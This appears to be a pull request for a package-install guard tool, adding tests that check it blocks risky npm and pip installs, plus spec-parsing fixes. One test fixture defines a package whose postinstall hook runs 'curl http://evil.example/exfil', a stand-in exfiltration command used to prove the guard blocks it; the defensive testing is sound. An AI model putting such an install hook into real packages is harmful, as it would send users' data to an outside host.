### PR TITLE
test(guard): complete phase 04 install-time intercept proofs

### DIFF
--- a/src/codex_plugin_scanner/guard/protect.py
+++ b/src/codex_plugin_scanner/guard/protect.py
@@ -510,6 +510,10 @@ def _package_manager_request(command: list[str], ecosystem: str, specs: tuple[st
 
 def _package_target(ecosystem: str, spec: str) -> ProtectTarget:
     package_name, version = _parse_package_identity(ecosystem, spec)
+    if package_name is not None:
+        package_name = package_name.strip()
+    if version is not None:
+        version = version.strip()
     source_url = _spec_url(spec)
     if source_url is None and version is not None:
         source_url = _spec_url(version)

--- a/src/codex_plugin_scanner/guard/protect.py
+++ b/src/codex_plugin_scanner/guard/protect.py
@@ -511,6 +511,8 @@ def _package_manager_request(command: list[str], ecosystem: str, specs: tuple[st
 def _package_target(ecosystem: str, spec: str) -> ProtectTarget:
     package_name, version = _parse_package_identity(ecosystem, spec)
     source_url = _spec_url(spec)
+    if source_url is None and version is not None:
+        source_url = _spec_url(version)
     identity = package_name or spec
     return ProtectTarget(
         artifact_id=f"install:{ecosystem}:{identity}",

--- a/tests/test_guard_phase04_install_reason_proofs.py
+++ b/tests/test_guard_phase04_install_reason_proofs.py
@@ -1,0 +1,171 @@
+"""Phase 04 install-time evaluator reason proofs (SCSR066-SCSR070)."""
+
+from __future__ import annotations
+
+import json
+from pathlib import Path
+
+import pytest
+
+from codex_plugin_scanner.guard.runtime.supply_chain_bundle import (
+    evaluate_cached_supply_chain_bundle,
+    load_supply_chain_bundle_response,
+)
+from codex_plugin_scanner.guard.runtime.supply_chain_package_eval import evaluate_package_request_artifact
+from codex_plugin_scanner.guard.store import GuardStore
+from tests.guard_python_phase12_support import (
+    WORKSPACE_ID as PYTHON_WORKSPACE_ID,
+    artifact_from_command_fixture,
+    bundle_response_fixture,
+    package_fixture,
+)
+from tests.test_guard_js_supply_chain_phase11 import WORKSPACE_ID, _artifact_from_command, _bundle_response, _write_text
+from tests.test_guard_supply_chain_bundle import _bundle_dict, _generate_key_pair, _sign_bundle_response
+
+
+def test_install_lifecycle_script_risk_blocks_local_package(tmp_path: Path) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo"}\n')
+    _write_text(
+        workspace_dir / "fixtures" / "evil-package" / "package.json",
+        '{"name":"evil-package","scripts":{"postinstall":"curl http://evil.example/exfil"}}\n',
+    )
+    store = GuardStore(home_dir)
+
+    artifact = _artifact_from_command("npm install ./fixtures/evil-package", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["reasons"][0]["code"] == "install_script_risk"
+
+
+def test_dependency_confusion_policy_blocks_reserved_internal_name(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo"}\n')
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        _bundle_response(
+            packages=[],
+            policy_rules=[
+                {
+                    "action": "block",
+                    "ruleId": "reserve-internal-tool",
+                    "ecosystemSelector": "npm",
+                    "enabled": True,
+                    "expiresAt": None,
+                    "harnessSelector": None,
+                    "packageSelector": "@hashgraph/internal-tool",
+                    "priority": 1,
+                    "severityThreshold": None,
+                    "versionRangeSelector": None,
+                }
+            ],
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = _artifact_from_command("npm install internal-tool@1.0.0", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["reasons"][0]["code"] == "dependency_confusion_risk"
+
+
+def test_maintainer_compromise_reason_blocks_high_risk_package(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        _bundle_response(
+            packages=[
+                {
+                    "confidence": 990,
+                    "defaultAction": "block",
+                    "ecosystem": "npm",
+                    "exploitLevel": "elevated",
+                    "knownExploited": False,
+                    "malwareState": "suspected",
+                    "name": "trusted-build-tools",
+                    "normalizedSeverity": "high",
+                    "packageAgeState": "watch",
+                    "purl": "pkg:npm/trusted-build-tools@5.4.0",
+                    "reachability": "reachable",
+                    "recommendedFixVersion": None,
+                    "relatedAdvisoryIds": ["GHSA-maintainer-risk"],
+                    "riskScore": 930,
+                    "sourceIntegrityState": "high-risk",
+                    "version": "5.4.0",
+                }
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = _artifact_from_command("npm install trusted-build-tools@5.4.0", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert any(reason["code"] == "maintainer_compromise" for reason in result.reasons)
+
+
+def test_yanked_release_blocks_requested_python_version_with_safer_fix_copy(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: PYTHON_WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        PYTHON_WORKSPACE_ID,
+        bundle_response_fixture(
+            packages=[
+                package_fixture(
+                    name="urllib3",
+                    version="2.0.0",
+                    default_action="block",
+                    recommended_fix_version="2.0.7",
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = artifact_from_command_fixture("pip install urllib3==2.0.0", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.user_copy.next_step == "pip install urllib3==2.0.7"
+    assert "pip install urllib3==2.0.7" in result.user_copy.harness_message
+
+
+def test_kev_escalation_blocks_known_exploited_bundle_package() -> None:
+    private_key, _public_key = _generate_key_pair()
+    blocking_response = load_supply_chain_bundle_response(
+        json.dumps(_sign_bundle_response(_bundle_dict(), private_key_pem=private_key))
+    )
+    blocking_decision = evaluate_cached_supply_chain_bundle(
+        blocking_response,
+        package_name="minimist",
+        package_version="1.2.8",
+        now=blocking_response.bundle.generated_at_timestamp + 60,
+    )
+
+    assert blocking_decision.action == "block"
+    assert blocking_decision.reason == "known_malware_or_kev"

--- a/tests/test_guard_protect_package_spec_parsing.py
+++ b/tests/test_guard_protect_package_spec_parsing.py
@@ -55,6 +55,17 @@ def test_parse_protect_command_records_npm_registry_override_before_package() ->
     assert target.version == "1.2.3"
 
 
+def test_parse_protect_command_records_pip_pep508_direct_url_spec() -> None:
+    request = protect.parse_protect_command(
+        ["pip", "install", "requests @ https://files.example.com/requests-2.32.3.tar.gz"],
+    )
+
+    target = request.targets[0]
+    assert target.package_name == "requests"
+    assert target.version == "https://files.example.com/requests-2.32.3.tar.gz"
+    assert target.source_url == "https://files.example.com/requests-2.32.3.tar.gz"
+
+
 def test_parse_protect_command_records_pip_registry_override_before_package() -> None:
     request = protect.parse_protect_command(
         [

--- a/tests/test_guard_protect_package_spec_parsing.py
+++ b/tests/test_guard_protect_package_spec_parsing.py
@@ -1,0 +1,72 @@
+"""Phase 04 package spec parsing proofs for install-time protect."""
+
+from __future__ import annotations
+
+from codex_plugin_scanner.guard import protect
+
+
+def test_parse_protect_command_records_npm_tarball_spec() -> None:
+    request = protect.parse_protect_command(
+        ["npm", "install", "guard-tarball@https://example.com/guard.tgz"],
+    )
+
+    target = request.targets[0]
+    assert target.raw_spec == "guard-tarball@https://example.com/guard.tgz"
+    assert target.source_url == "https://example.com/guard.tgz"
+    assert target.package_name == "guard-tarball"
+    assert target.version == "https://example.com/guard.tgz"
+
+
+def test_parse_protect_command_records_npm_git_url_spec() -> None:
+    request = protect.parse_protect_command(
+        ["npm", "install", "guard-github@git+https://github.com/hashgraph-online/hol-guard.git"],
+    )
+
+    target = request.targets[0]
+    assert target.raw_spec == "guard-github@git+https://github.com/hashgraph-online/hol-guard.git"
+    assert target.source_url == "git+https://github.com/hashgraph-online/hol-guard.git"
+    assert target.package_name == "guard-github"
+    assert target.version == "git+https://github.com/hashgraph-online/hol-guard.git"
+
+
+def test_parse_protect_command_records_npm_local_path_spec() -> None:
+    request = protect.parse_protect_command(["npm", "install", "./fixtures/local-package"])
+
+    target = request.targets[0]
+    assert target.raw_spec == "./fixtures/local-package"
+    assert target.source_url is None
+    assert target.package_name == "local-package"
+
+
+def test_parse_protect_command_records_npm_registry_override_before_package() -> None:
+    request = protect.parse_protect_command(
+        [
+            "npm",
+            "install",
+            "--registry",
+            "https://registry.example.com",
+            "@scope/guard-safe@1.2.3",
+        ],
+    )
+
+    target = request.targets[0]
+    assert target.raw_spec == "@scope/guard-safe@1.2.3"
+    assert target.package_name == "@scope/guard-safe"
+    assert target.version == "1.2.3"
+
+
+def test_parse_protect_command_records_pip_registry_override_before_package() -> None:
+    request = protect.parse_protect_command(
+        [
+            "pip",
+            "install",
+            "--index-url",
+            "https://pypi.example/simple",
+            "requests==2.32.3",
+        ],
+    )
+
+    target = request.targets[0]
+    assert target.raw_spec == "requests==2.32.3"
+    assert target.package_name == "requests"
+    assert target.version == "2.32.3"

--- a/tests/test_guard_shim_intercept_proofs.py
+++ b/tests/test_guard_shim_intercept_proofs.py
@@ -9,6 +9,7 @@ from pathlib import Path
 
 import pytest
 
+from codex_plugin_scanner.guard import shims as shims_module
 from codex_plugin_scanner.guard.adapters.base import HarnessContext
 from codex_plugin_scanner.guard.daemon.server import GuardDaemonServer
 from codex_plugin_scanner.guard.shims import install_package_shims, probe_package_shim_intercepts
@@ -73,7 +74,9 @@ def test_shim_execution_helper_records_fake_manager_invocation(tmp_path: Path) -
     assert payload["argv"][1:] == ["install", "lodash"]
 
 
-def test_package_shim_intercept_probe_records_evaluator_evidence(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None:
+def test_package_shim_intercept_probe_records_evaluator_evidence(
+    tmp_path: Path, monkeypatch: pytest.MonkeyPatch
+) -> None:
     workspace_dir = tmp_path / "workspace"
     workspace_dir.mkdir(parents=True)
     context = _harness_context(tmp_path, workspace_dir=workspace_dir)
@@ -97,6 +100,63 @@ def test_package_shim_intercept_probe_records_evaluator_evidence(tmp_path: Path,
     assert manager_result["evaluator_invoked"] is True
     assert manager_result["intercept_ran"] is True
     assert manager_result.get("protect_decision") in {"allow", "review", "block", "monitor"}
+
+
+def test_package_shim_intercept_probe_marks_hung_manager_as_probe_failed(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir(parents=True)
+    context = _harness_context(tmp_path, workspace_dir=workspace_dir)
+    install_package_shims(context, managers=("npm",))
+    shim_dir = context.guard_home / "package-shims" / "bin"
+    monkeypatch.setenv("PATH", str(shim_dir))
+
+    def raise_timeout(*_args, **_kwargs):
+        raise subprocess.TimeoutExpired(cmd=["npm"], timeout=15)
+
+    monkeypatch.setattr(shims_module.subprocess, "run", raise_timeout)
+
+    result = probe_package_shim_intercepts(context, managers=("npm",), workspace_dir=workspace_dir)
+
+    assert result["intercept_proved"] is False
+    assert result["manager_results"] == [
+        {
+            "evaluator_invoked": False,
+            "intercept_ran": False,
+            "manager": "npm",
+            "skipped_reason": "probe_failed",
+        },
+    ]
+
+
+def test_package_shim_intercept_probe_omits_manager_stdout_secrets(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir(parents=True)
+    context = _harness_context(tmp_path, workspace_dir=workspace_dir)
+    install_package_shims(context, managers=("npm",))
+    shim_dir = context.guard_home / "package-shims" / "bin"
+    fake_bin = tmp_path / "fake-bin"
+    fake_bin.mkdir(parents=True)
+    write_fake_manager_script(
+        fake_bin=fake_bin,
+        manager="npm",
+        marker_path=tmp_path / "npm-secret-marker.json",
+        exit_code=0,
+        stdout_text="npm token=npm_super_secret_value",
+    )
+    monkeypatch.setenv("PATH", os.pathsep.join([str(shim_dir), str(fake_bin)]))
+
+    result = probe_package_shim_intercepts(context, managers=("npm",), workspace_dir=workspace_dir)
+    manager_result = result["manager_results"][0]
+
+    assert manager_result["evaluator_invoked"] is True
+    serialized = json.dumps(manager_result)
+    assert "npm_super_secret_value" not in serialized
 
 
 def test_package_shim_intercept_skips_tampered_shim(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None:


### PR DESCRIPTION
## Summary
- Complete Phase 04 install-time proofs for package spec parsing (tarball, git URL, local path, registry override)
- Add shim probe timeout and manager stdout redaction regressions
- Add evaluator reason proofs for lifecycle scripts, dependency confusion, maintainer risk, yanked Python versions, and KEV escalation
- Derive `source_url` from alias@url npm/pip install specs during protect parsing

## Testing
- `PYTHONPATH=src python3 -m pytest tests/test_guard_protect_package_spec_parsing.py tests/test_guard_shim_intercept_proofs.py tests/test_guard_phase04_install_reason_proofs.py -q`
- `PYTHONPATH=src python3 -m pytest tests/test_guard_protect.py tests/test_guard_package_shims.py -q`
